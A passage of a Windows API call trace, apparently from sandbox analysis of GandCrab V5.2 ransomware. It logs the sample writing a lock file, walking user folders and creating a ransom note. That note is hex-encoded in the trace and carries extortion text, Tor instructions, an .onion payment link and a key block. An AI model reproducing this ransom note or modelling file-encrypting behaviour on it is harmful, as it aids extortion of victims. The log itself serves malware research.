lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0xfe)) [0096.936] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.936] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.936] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.936] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Start Menu\\d2ca4a09d2ca4deb61a.lock") returned 52 [0096.937] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\start menu\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.938] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.938] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.938] lstrlenW (lpString="C:\\Users\\Default\\Start Menu\\") returned 28 [0096.938] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*") returned="C:\\Users\\Default\\Start Menu\\*" [0096.938] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.939] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.939] CloseHandle (hObject=0x230) returned 1 [0096.939] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.939] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0096.939] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0096.939] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0096.939] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\" [0096.939] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.939] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.939] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.940] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.940] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.940] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.940] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.940] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Templates\\\\TITWMVJL-DECRYPT.txt") returned 48 [0096.940] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\templates\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.941] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d